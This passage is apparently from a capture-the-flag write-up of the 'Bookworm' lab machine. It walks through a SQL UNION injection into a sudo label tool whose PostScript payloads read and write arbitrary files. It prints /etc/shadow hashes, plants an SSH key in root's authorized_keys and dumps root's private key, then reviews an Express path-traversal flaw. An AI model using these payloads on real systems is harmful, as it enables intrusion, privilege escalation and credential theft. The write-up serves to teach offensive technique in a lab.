-dNOSAFER (equivalent to -dDELAYSAFER).
This flag disables SAFER mode until the .setsafe procedure is run. This is intended for clients or scripts that cannot operate in SAFER mode. If Ghostscript is started with -dNOSAFER or -dDELAYSAFER, PostScript programs are allowed to read, write, rename or delete any files in the system that are not protected by operating system permissions.
Being able to read and write files seems very useful.
I noted above that the SQL query made by genlabel looked vulnerable to SQL injection. If so, I can control what gets written into the .ps file. PostScript is a page description language used to define what a document will look like, similar to a PDF. If I can inject dangerous PostScript commands into the file passed to ps2pdf, I can read and write files.
The SQL query is:
SELECT name, addressLine1, addressLine2, town, postcode, Orders.id as orderId, Users.id as userId FROM Orders LEFT JOIN Users On Orders.userId = Users.id WHERE Orders.id = %s
I’ll give it an order id that doesn’t exist (99999) and then use UNION injection to return a row of values I control:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT 1,2,3,4,5,6,7;'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpr7ejbvakprintgen
I’ll scp the output to my host:
oxdf@hacky$ scp -i ~/keys/ed25519_gen neil@bookworm.htb:/tmp/tmpr7ejbvakprintgen/* .
output.pdf 100% 43KB 133.5KB/s 00:00
output.ps 100% 1751 15.6KB/s 00:00
The output I set shows up in the PS file in blocks like this:
...[snip]...
/Courier-bold
20 selectfont
50 550 moveto
(1) show
/Courier
20 selectfont
50 525 moveto
(2) show
/Courier
20 selectfont
50 500 moveto
(3) show
/Courier
20 selectfont
50 475 moveto
(4) show
/Courier
20 selectfont
50 450 moveto
(5) show
...[snip]...
These show up in the PDF:
So the SQL injection works.
The documentation for how to do file I/O through PostScript isn’t great, but this Stack Overflow answer offers a nice POC:
/outfile1 (output1.txt) (w) file def
outfile1 (blah blah blah) writestring
outfile1 closefile
/inputfile (output1.txt) (r) file def
inputfile 100 string readstring
pop
inputfile closefile
/outfile2 (output2.txt) (w) file def
outfile2 exch writestring
outfile2 closefile
It writes a file, then reads that file back and writes the result to another file. I can start with writing a file using just the last block, replacing exch with some static text:
/outfile (output.txt) (w) file def
outfile (this is a test) writestring
outfile closefile
Putting that into the injection:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /outfile (output.txt) (w) file def
> outfile (this is a test) writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpce7s4u1wprintgen
I don’t care about the PDF output, but rather that there’s an output.txt in the current directory:
neil@bookworm:~$ ls -l output.txt
-rw-r--r-- 1 root root 14 Jan 17 18:41 output.txt
neil@bookworm:~$ cat output.txt
this is a test
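Why the payload is wrapped in 0xdf) ... (test: the template puts each value inside a PostScript string like (NAME) show, so the injected value has to close that string, run its own operators, and then reopen a string so the rest of the line still parses. A Python sketch of the substitution (the template line here is a simplified stand-in for one line of the real template):

```python
# Simplified stand-in for one line of template.ps
template = "(NAME) show"

# The injected "name" column: close the string, run PostScript, reopen a string
name = ("0xdf)\n"
        "/outfile (output.txt) (w) file def\n"
        "outfile (this is a test) writestring\n"
        "outfile closefile\n"
        "(test")

print(template.replace("NAME", name))
# (0xdf)
# /outfile (output.txt) (w) file def
# outfile (this is a test) writestring
# outfile closefile
# (test) show
```

The result is still valid PostScript: (0xdf) is pushed as a harmless string, the file-write operators run, and (test) show displays “test”.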
I spent a long time with ChatGPT trying to get a POC that would read a file into the PDF without success. I’ll end up back with the POC from above, this time grabbing the second and third blocks:
/inputfile (/etc/shadow) (r) file def
inputfile 10000 string readstring
pop
inputfile closefile
/outfile (output.txt) (w) file def
outfile exch writestring
outfile closefile
I’ll need to increase the number on the second line, as that’s the number of bytes to be read, and I want more than 100. I’ll run this via the SQL injection:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /inputfile (/etc/shadow) (r) file def
> inputfile 10000 string readstring
> pop
> inputfile closefile
>
> /outfile (output.txt) (w) file def
> outfile exch writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpqsikna5vprintgen
neil@bookworm:~$ cat output.txt
root:$6$X.PJezLobVQOLuGu$nDnaPx.G5/nXr9I7WI0h8Sw0vjeFcOChirHr1s0zNyaid7X5U26fB5MXOIQB/oR4fb7xiaN/.bXdfAkGwtXL6.:19387:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
usbmux:*:19386:0:99999:7:::
sshd:*:19386:0:99999:7:::
systemd-coredump:!!:19386::::::
lxd:!:19386::::::
frank:$6$iQwYpaCFHgzFXVbi$gAKLi4oKtDPb4uaCGW3RkabZ8DyAnQfxbaqhoiAeAsGmP776eOyQt6bvYPPUJ4PAe2PJPanzm3sH5KSiqzrlF.:19387:0:99999:7:::
neil:$6$rN642RtN9dzlaylh$/7DIfm9515mWvCPWM/wL/ANkJJPtKkUNURqcmu/VseEhLch1pQgX7c3l3ij2vA3MmM3PZV5WOrLM7u3gy2V3W1:19387:0:99999:7:::
mysql:!:19387:0:99999:7:::
fwupd-refresh:*:19479:0:99999:7:::
_laurel:!:19480::::::
james:$6$m07oa4vs5KUfYS/j$SjFJnikcpxhLK5wt3cOEE218N1Bfv4M3bQyhUspkepSBzefsAKCFpXbI.JS8N/p17IaYSgG0A217veas0iSC51:19513:0:99999:7:::
That’s file read!
With the file write POC, I can simply update it to write my public SSH key into root’s authorized_keys file:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /outfile (/root/.ssh/authorized_keys) (w) file def
> outfile (ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing) writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpp2ccw7ubprintgen
Then I can SSH in as root:
oxdf@hacky$ ssh -i ~/keys/ed25519_gen root@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
root@bookworm:~#
And read the flag:
root@bookworm:~# cat root.txt
aab5a8b7************************
One way to get a shell via the file read is to grab root’s SSH key. Each user so far has had an id_ed25519 file in their .ssh directory. I’ll try to read root’s:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /inputfile (/root/.ssh/id_ed25519) (r) file def
> inputfile 1000 string readstring
>
> pop
> inputfile closefile
>
> /outfile (output.txt) (w) file def
> outfile exch writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpv5gne53tprintgen
The private key is in output.txt:
neil@bookworm:~$ cat output.txt
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
...[snip]...
-----END OPENSSH PRIVATE KEY-----
As long as I haven’t already overwritten authorized_keys, I can use that to SSH into the box:
oxdf@hacky$ ssh -i ~/keys/bookworm-root root@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
root@bookworm:~#
I’m going to take a quick look at the code in the website that allows for downloading of e-books either as a single PDF or as multiple files in a zip.
A useful bit of background for this code is how the NodeJS Express framework handles query parameters. This blog post demonstrates with some nice examples. ?color=black sets that parameter to a string, black. But ?color=black&color=green sets it to a list like ["black", "green"].
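Python’s standard library shows the same repeated-parameter behavior (parse_qs always returns lists, but the single vs. multiple distinction is the same idea):

```python
from urllib.parse import parse_qs

# One occurrence vs. a repeated parameter in the query string
print(parse_qs("color=black"))              # {'color': ['black']}
print(parse_qs("color=black&color=green"))  # {'color': ['black', 'green']}
```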
That’s how the code is able to use a typeof call to differentiate between a single download and multiple:
const { bookIds } = req.query;
if (typeof bookIds === "string") {
...[snip]...
} else if (Array.isArray(bookIds)) {
...[snip]...
} else {
res.sendStatus(404);
}
The single download code creates a filename of ID.pdf:
const fileName = `${bookIds}.pdf`;
Then it calls res.download (docs), which takes a path to the file, a filename, and options, and returns the file with the given name:
res.download(bookIds, fileName, { root: path.join(__dirname, "books") });
Here, bookIds is a single number, and fileName is [number].pdf. The root option puts it in the books directory, which holds a bunch of number-named files that are PDFs:
root@bookworm:/var/www/bookworm# file books/*
books/1: PDF document, version 1.3
books/10: PDF document, version 1.3
books/11: PDF document, version 1.3
books/12: PDF document, version 1.3
books/13: PDF document, version 1.3
books/14: PDF document, version 1.3
books/15: PDF document, version 1.3
books/16: PDF document, version 1.3
books/17: PDF document, version 1.3
books/18: PDF document, version 1.3
books/19: PDF document, version 1.3
books/2: PDF document, version 1.3
books/20: PDF document, version 1.3
books/3: PDF document, version 1.3
books/4: PDF document, version 1.3
books/5: PDF document, version 1.3
books/6: PDF document, version 1.3
books/7: PDF document, version 1.3
books/8: PDF document, version 1.3
books/9: PDF document, version 1.3
Injecting directory traversal into this doesn’t work.
This is because of the root parameter passed to download, which makes Express return a 403 if the request tries to read outside the root directory, in this case /var/www/bookworm/books.
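The containment check the root option implies can be sketched in Python: resolve the joined path and refuse anything that normalizes outside the root. The function name and behavior are my approximation, not Express’s actual code:

```python
import os.path

def safe_resolve(root, requested):
    # Resolve under root, then reject anything that escapes it after normalization
    root = os.path.abspath(root)
    full = os.path.abspath(os.path.join(root, requested))
    if os.path.commonpath([root, full]) != root:
        raise PermissionError("403: path escapes root")
    return full

print(safe_resolve("/var/www/bookworm/books", "5"))
# /var/www/bookworm/books/5
# safe_resolve("/var/www/bookworm/books", "../../../../etc/passwd") raises PermissionError
```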
This code path uses the archiver module. It creates an archiver object, and then uses the file API to add files to it.
const arch = archiver("zip");
for (const id of bookIds) {
const fileName = (await Book.findByPk(id))?.title ?? "Unknown";
arch.file(path.join(__dirname, "books", id), { name: `${fileName}.pdf` });
}
res.attachment(`Order ${orderId}.zip`).type("zip");
arch.on("end", () => res.end()); // end response when archive stream ends
arch.pipe(res);
arch.finalize();
The file path this time is created with path.join(__dirname, "books", id), which is totally open to traversal since I control id.
It tries to look the book name up in the database using the Book object, using optional chaining (?.) and nullish coalescing (??) so that if no book is found, it falls back to “Unknown”. This is why all of my exfil via the directory traversal comes out as Unknown.pdf, and what limits me from collecting multiple files in the same archive, since they would all get the same name.